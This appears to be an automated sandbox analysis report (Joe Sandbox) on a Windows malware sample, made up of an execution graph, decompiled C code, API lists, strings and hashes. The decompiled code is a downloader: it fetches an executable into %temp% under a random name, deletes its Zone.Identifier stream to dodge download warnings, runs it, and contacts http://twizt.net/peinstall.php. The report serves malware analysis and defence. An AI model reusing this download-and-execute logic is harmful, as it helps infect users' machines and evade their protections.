                                                                                                                                                                                                                                                                                    execution_graph 206 1091469 227 10919fc 206->227 208 1091475 GetStartupInfoA 209 10914a3 InterlockedCompareExchange 208->209 210 10914b5 209->210 211 10914b1 209->211 213 10914df 210->213 214 10914d5 _amsg_exit 210->214 211->210 212 10914bc Sleep 211->212 212->209 215 1091508 213->215 216 10914e8 _initterm_e 213->216 214->215 217 1091532 215->217 218 1091517 _initterm 215->218 216->215 220 1091503 __onexit 216->220 219 1091536 InterlockedExchange 217->219 222 109153e __IsNonwritableInCurrentImage 217->222 218->217 219->222 221 10915cd _ismbblead 221->222 222->221 224 1091612 222->224 225 10915b7 exit 222->225 228 10913e0 Sleep 222->228 224->220 226 109161b _cexit 224->226 225->222 226->220 227->208 235 1091080 7 API calls 228->235 232 10913fd 233 1091406 232->233 257 1091300 InternetOpenA 232->257 233->222 236 109122b InternetCloseHandle Sleep 235->236 237 1091121 InternetOpenUrlW 235->237 238 10912ee 236->238 239 1091244 6 API calls 236->239 240 1091223 InternetCloseHandle 237->240 241 1091143 CreateFileW 237->241 252 1091360 ExpandEnvironmentStringsW wsprintfW PathFileExistsW 238->252 239->238 242 10912b5 wsprintfW DeleteFileW Sleep 239->242 240->236 243 1091168 InternetReadFile 241->243 244 1091216 CloseHandle 241->244 245 1091000 3 API calls 242->245 246 10911bf CloseHandle Sleep wsprintfW DeleteFileW Sleep 243->246 247 1091187 243->247 244->240 248 10912eb 245->248 260 1091000 memset CreateProcessW 246->260 247->246 249 109118f WriteFile InternetReadFile 247->249 248->238 249->246 249->247 251 1091207 251->244 253 10913b0 CreateFileW 252->253 254 10913a7 252->254 255 10913cf CloseHandle 253->255 256 10913d6 253->256 254->232 255->256 256->232 258 1091328 InternetOpenUrlA Sleep InternetCloseHandle 257->258 259 109134a Sleep InternetCloseHandle 257->259 258->259 259->233 261 1091078 260->261 262 1091067 Sleep 260->262 261->251 262->251 276 1091729 279 1091aa8 276->279 278 109172e 278->278 280 1091ada GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 279->280 281 1091acd 279->281 282 1091ad1 280->282 281->280 281->282 282->278 263 1091648 265 1091656 __set_app_type _encode_pointer __p__fmode __p__commode 263->265 266 10916f5 _pre_c_init __RTC_Initialize 265->266 267 109170f 266->267 268 1091703 __setusermatherr 266->268 273 1091a7a _controlfp_s 267->273 268->267 271 109171d _configthreadlocale 272 1091726 271->272 274 1091714 273->274 275 1091a96 _invoke_watson 273->275 274->271 274->272 275->274 301 1091b78 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 302 1091c6a GetCurrentProcess TerminateProcess 301->302 303 1091c62 _crt_debugger_hook 301->303 303->302 283 1091423 288 109182f 283->288 286 1091468 287 1091460 _amsg_exit 287->286 291 109178a 288->291 290 1091428 __getmainargs 290->286 290->287 298 10919fc 291->298 293 1091796 _decode_pointer 294 10917b9 7 API calls 293->294 295 10917ad _onexit 293->295 299 1091826 _unlock 294->299 296 109181d __onexit 295->296 296->290 298->293 299->296 300 10915e3 _XcptFilter 304 1091733 305 109176f 304->305 307 1091745 304->307 306 109176a ?terminate@ 306->305 307->305 307->306 308 1091a55 _except_handler4_common 309 10915f7 310 109160b _exit 309->310 311 1091612 309->311 310->311 312 109161b _cexit 311->312 313 1091621 __onexit 311->313 312->313

                                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E01091080(void* __edi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                                                                                    				WCHAR* _v8;
                                                                                                                                                                                                                                                                                    				short _v520;
                                                                                                                                                                                                                                                                                    				char _v536;
                                                                                                                                                                                                                                                                                    				short _v1060;
                                                                                                                                                                                                                                                                                    				short _v1068;
                                                                                                                                                                                                                                                                                    				short _v1084;
                                                                                                                                                                                                                                                                                    				short _v1092;
                                                                                                                                                                                                                                                                                    				void _v1336;
                                                                                                                                                                                                                                                                                    				void _v1352;
                                                                                                                                                                                                                                                                                    				short _v1820;
                                                                                                                                                                                                                                                                                    				char _v1828;
                                                                                                                                                                                                                                                                                    				char _v1833;
                                                                                                                                                                                                                                                                                    				short _v1836;
                                                                                                                                                                                                                                                                                    				void* _v1840;
                                                                                                                                                                                                                                                                                    				char _v1848;
                                                                                                                                                                                                                                                                                    				char _v1849;
                                                                                                                                                                                                                                                                                    				short _v1856;
                                                                                                                                                                                                                                                                                    				char _v1864;
                                                                                                                                                                                                                                                                                    				long _v1868;
                                                                                                                                                                                                                                                                                    				void* _v1872;
                                                                                                                                                                                                                                                                                    				long _v1876;
                                                                                                                                                                                                                                                                                    				char _v1877;
                                                                                                                                                                                                                                                                                    				long _v1884;
                                                                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                                                                    				int _t60;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                                                                    				int _t78;
                                                                                                                                                                                                                                                                                    				char _t84;
                                                                                                                                                                                                                                                                                    				long _t85;
                                                                                                                                                                                                                                                                                    				int _t88;
                                                                                                                                                                                                                                                                                    				void* _t120;
                                                                                                                                                                                                                                                                                    				void* _t123;
                                                                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                                                                    				short* _t129;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_v1833 = 0;
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v520, 0x104);
                                                                                                                                                                                                                                                                                    				_t53 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_t55 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1820, L"%s\\%d%d.exe",  &_v520, _t55 % 0x7fff + 0x3e8, _t53 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    				_t129 =  &(( &_v1836)[0xc]);
                                                                                                                                                                                                                                                                                    				_t59 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_t125 = _t59;
                                                                                                                                                                                                                                                                                    				_v1840 = _t125;
                                                                                                                                                                                                                                                                                    				if(_t125 == 0) {
                                                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                                                    					_t60 = InternetCloseHandle(_t125);
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					if(_v1849 != 0) {
                                                                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                                                                    						return _t60;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t61 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					Sleep(_t61 % 0xea60 + 0x2710);
                                                                                                                                                                                                                                                                                    					_t63 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t65 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t60 = wsprintfW( &_v1836, L"%s\\%d%d.exe",  &_v536, _t65 % 0x7fff + 0x3e8, _t63 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( &_v1828);
                                                                                                                                                                                                                                                                                    					_push(_v4);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					L01091C84();
                                                                                                                                                                                                                                                                                    					if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v1068, L"%s:Zone.Identifier",  &_v1848);
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v1060);
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return E01091000( &_v1840);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t73 = InternetOpenUrlW(_t125, _v8, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_t120 = _t73;
                                                                                                                                                                                                                                                                                    				if(_t120 == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_t120); // executed
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t75 = CreateFileW( &_v1856, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_t123 = _t75;
                                                                                                                                                                                                                                                                                    				if(_t123 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					CloseHandle(_t123); // executed
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t78 = InternetReadFile(_t120,  &_v1336, 0x103,  &_v1868); // executed
                                                                                                                                                                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					CloseHandle(_t123);
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v1092, L"%s:Zone.Identifier",  &_v1872);
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v1084);
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					_t84 = E01091000( &_v1864);
                                                                                                                                                                                                                                                                                    					_t125 = _v1872;
                                                                                                                                                                                                                                                                                    					_t129 =  &(_t129[8]);
                                                                                                                                                                                                                                                                                    					if(_t84 == 1) {
                                                                                                                                                                                                                                                                                    						_v1877 = _t84;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                                                                    					_t85 = _v1884;
                                                                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					WriteFile(_t123,  &_v1352, _t85,  &_v1876, 0); // executed
                                                                                                                                                                                                                                                                                    					_t88 = InternetReadFile(_t120,  &_v1352, 0x103,  &_v1884); // executed
                                                                                                                                                                                                                                                                                    					if(_t88 != 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                                                                                    			}












































                                                                                                                                                                                                                                                                                    0x01091090
                                                                                                                                                                                                                                                                                    0x010910aa
                                                                                                                                                                                                                                                                                    0x010910af
                                                                                                                                                                                                                                                                                    0x010910b5
                                                                                                                                                                                                                                                                                    0x010910ba
                                                                                                                                                                                                                                                                                    0x010910c9
                                                                                                                                                                                                                                                                                    0x010910ce
                                                                                                                                                                                                                                                                                    0x010910f5
                                                                                                                                                                                                                                                                                    0x010910f7
                                                                                                                                                                                                                                                                                    0x01091107
                                                                                                                                                                                                                                                                                    0x01091113
                                                                                                                                                                                                                                                                                    0x01091115
                                                                                                                                                                                                                                                                                    0x0109111b
                                                                                                                                                                                                                                                                                    0x0109122b
                                                                                                                                                                                                                                                                                    0x0109122c
                                                                                                                                                                                                                                                                                    0x01091237
                                                                                                                                                                                                                                                                                    0x0109123e
                                                                                                                                                                                                                                                                                    0x010912f7
                                                                                                                                                                                                                                                                                    0x010912f7
                                                                                                                                                                                                                                                                                    0x010912f7
                                                                                                                                                                                                                                                                                    0x01091244
                                                                                                                                                                                                                                                                                    0x01091249
                                                                                                                                                                                                                                                                                    0x01091258
                                                                                                                                                                                                                                                                                    0x0109125a
                                                                                                                                                                                                                                                                                    0x0109125f
                                                                                                                                                                                                                                                                                    0x0109126e
                                                                                                                                                                                                                                                                                    0x01091273
                                                                                                                                                                                                                                                                                    0x01091294
                                                                                                                                                                                                                                                                                    0x010912a0
                                                                                                                                                                                                                                                                                    0x010912a2
                                                                                                                                                                                                                                                                                    0x010912a8
                                                                                                                                                                                                                                                                                    0x010912a9
                                                                                                                                                                                                                                                                                    0x010912aa
                                                                                                                                                                                                                                                                                    0x010912ac
                                                                                                                                                                                                                                                                                    0x010912b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x010912c7
                                                                                                                                                                                                                                                                                    0x010912d4
                                                                                                                                                                                                                                                                                    0x010912df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x010912eb
                                                                                                                                                                                                                                                                                    0x01091133
                                                                                                                                                                                                                                                                                    0x01091139
                                                                                                                                                                                                                                                                                    0x0109113d
                                                                                                                                                                                                                                                                                    0x01091223
                                                                                                                                                                                                                                                                                    0x01091224
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0109122a
                                                                                                                                                                                                                                                                                    0x01091157
                                                                                                                                                                                                                                                                                    0x0109115d
                                                                                                                                                                                                                                                                                    0x01091162
                                                                                                                                                                                                                                                                                    0x01091216
                                                                                                                                                                                                                                                                                    0x01091217
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0109121d
                                                                                                                                                                                                                                                                                    0x01091181
                                                                                                                                                                                                                                                                                    0x01091185
                                                                                                                                                                                                                                                                                    0x010911bf
                                                                                                                                                                                                                                                                                    0x010911c0
                                                                                                                                                                                                                                                                                    0x010911cb
                                                                                                                                                                                                                                                                                    0x010911df
                                                                                                                                                                                                                                                                                    0x010911f0
                                                                                                                                                                                                                                                                                    0x010911fb
                                                                                                                                                                                                                                                                                    0x01091202
                                                                                                                                                                                                                                                                                    0x01091207
                                                                                                                                                                                                                                                                                    0x0109120b
                                                                                                                                                                                                                                                                                    0x01091210
                                                                                                                                                                                                                                                                                    0x01091212
                                                                                                                                                                                                                                                                                    0x01091212
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x01091187
                                                                                                                                                                                                                                                                                    0x01091187
                                                                                                                                                                                                                                                                                    0x01091187
                                                                                                                                                                                                                                                                                    0x0109118d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x010911a0
                                                                                                                                                                                                                                                                                    0x010911b9
                                                                                                                                                                                                                                                                                    0x010911bd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x010911bd
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 01091089
                                                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 01091090
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32 ref: 010910AF
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 010910B5
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 010910C9
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 010910F5
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 01091107
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 01091133
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 01091157
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 01091181
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010911A0
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 010911B9
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 010911C0
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,%temp%,?,00000104), ref: 010911CB
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 010911DF
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,%temp%,?,00000104), ref: 010911F0
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,%temp%,?,00000104), ref: 010911FB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 01091217
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 01091224
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0109122C
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,%temp%,?,00000104), ref: 01091237
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 01091244
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 01091258
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 0109125A
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 0109126E
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 01091294
                                                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 010912AC
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 010912C7
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 010912D4
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 010912DF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 010911D9
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 01091102
                                                                                                                                                                                                                                                                                    • %temp%, xrefs: 010910A5
                                                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 010910EF
                                                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 0109128E
                                                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 010912C1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.379745424.0000000001091000.00000020.00000001.01000000.00000003.sdmp, Offset: 01090000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379706425.0000000001090000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379751346.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379756642.0000000001094000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_1090000_gEkl9O5tiu.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Internet$Sleeprand$CloseHandlewsprintf$DeleteOpenRead$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                                                    • API String ID: 1709977946-1161929716
                                                                                                                                                                                                                                                                                    • Opcode ID: 87f04645411bd8907e684f4e8f9a9ec9ea56a17b6e4c8fda6d6f1f4d619f8815
                                                                                                                                                                                                                                                                                    • Instruction ID: 2ceddd9cf98540f136d6c739c244cd2d8fe26842cf5c10a68b5d9f8423f758b6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87f04645411bd8907e684f4e8f9a9ec9ea56a17b6e4c8fda6d6f1f4d619f8815
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B45118B1648301BBE730E764DC96FAF33ADABC8710F00091DF6C5960C1DAB8A604D7A6
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E01091300() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_t9 = _t1;
                                                                                                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                                                                                                    					_t3 = InternetOpenUrlA(_t9, "http://twizt.net/peinstall.php", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_t3); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				return InternetCloseHandle(_t9);
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x01091310
                                                                                                                                                                                                                                                                                    0x01091322
                                                                                                                                                                                                                                                                                    0x01091326
                                                                                                                                                                                                                                                                                    0x01091337
                                                                                                                                                                                                                                                                                    0x01091344
                                                                                                                                                                                                                                                                                    0x01091347
                                                                                                                                                                                                                                                                                    0x01091349
                                                                                                                                                                                                                                                                                    0x0109134f
                                                                                                                                                                                                                                                                                    0x01091357

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 01091310
                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 01091337
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 01091344
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 01091347
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0109134F
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 01091352
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0109130B
                                                                                                                                                                                                                                                                                    • http://twizt.net/peinstall.php, xrefs: 01091331
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.379745424.0000000001091000.00000020.00000001.01000000.00000003.sdmp, Offset: 01090000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379706425.0000000001090000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379751346.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379756642.0000000001094000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_1090000_gEkl9O5tiu.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpenSleep
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/peinstall.php
                                                                                                                                                                                                                                                                                    • API String ID: 256278798-2653881570
                                                                                                                                                                                                                                                                                    • Opcode ID: a0a42b107129a2654b347cdf8eca3c5c2e3af77caeeb7336c0cb1e823a9292c9
                                                                                                                                                                                                                                                                                    • Instruction ID: d6e20309f7cb0e1ca0fb8f5dcff67b7279bf29e88cb4eca0e820d7e688e2340e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0a42b107129a2654b347cdf8eca3c5c2e3af77caeeb7336c0cb1e823a9292c9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF092317C231477F23223659D9BF6E3B59EBC6F91F214141F7413E1C58E96A800926D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E01091360() {
                                                                                                                                                                                                                                                                                    				short _v520;
                                                                                                                                                                                                                                                                                    				short _v1032;
                                                                                                                                                                                                                                                                                    				short _v1040;
                                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v520, 0x104);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1040, L"%s\\33573537.jpg",  &_v520);
                                                                                                                                                                                                                                                                                    				_t9 = PathFileExistsW( &(( &_v1040)[6])); // executed
                                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                                    					_t10 = CreateFileW( &_v1032, 0x40000000, 0, 0, 1, 2, 0); // executed
                                                                                                                                                                                                                                                                                    					if(_t10 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						CloseHandle(_t10); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x01091378
                                                                                                                                                                                                                                                                                    0x01091390
                                                                                                                                                                                                                                                                                    0x0109139d
                                                                                                                                                                                                                                                                                    0x010913a5
                                                                                                                                                                                                                                                                                    0x010913c4
                                                                                                                                                                                                                                                                                    0x010913cd
                                                                                                                                                                                                                                                                                    0x010913d0
                                                                                                                                                                                                                                                                                    0x010913d0
                                                                                                                                                                                                                                                                                    0x010913de
                                                                                                                                                                                                                                                                                    0x010913a7
                                                                                                                                                                                                                                                                                    0x010913af
                                                                                                                                                                                                                                                                                    0x010913af

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 01091378
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 01091390
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0109139D
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 010913C4
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 010913D0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.379745424.0000000001091000.00000020.00000001.01000000.00000003.sdmp, Offset: 01090000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379706425.0000000001090000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379751346.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379756642.0000000001094000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
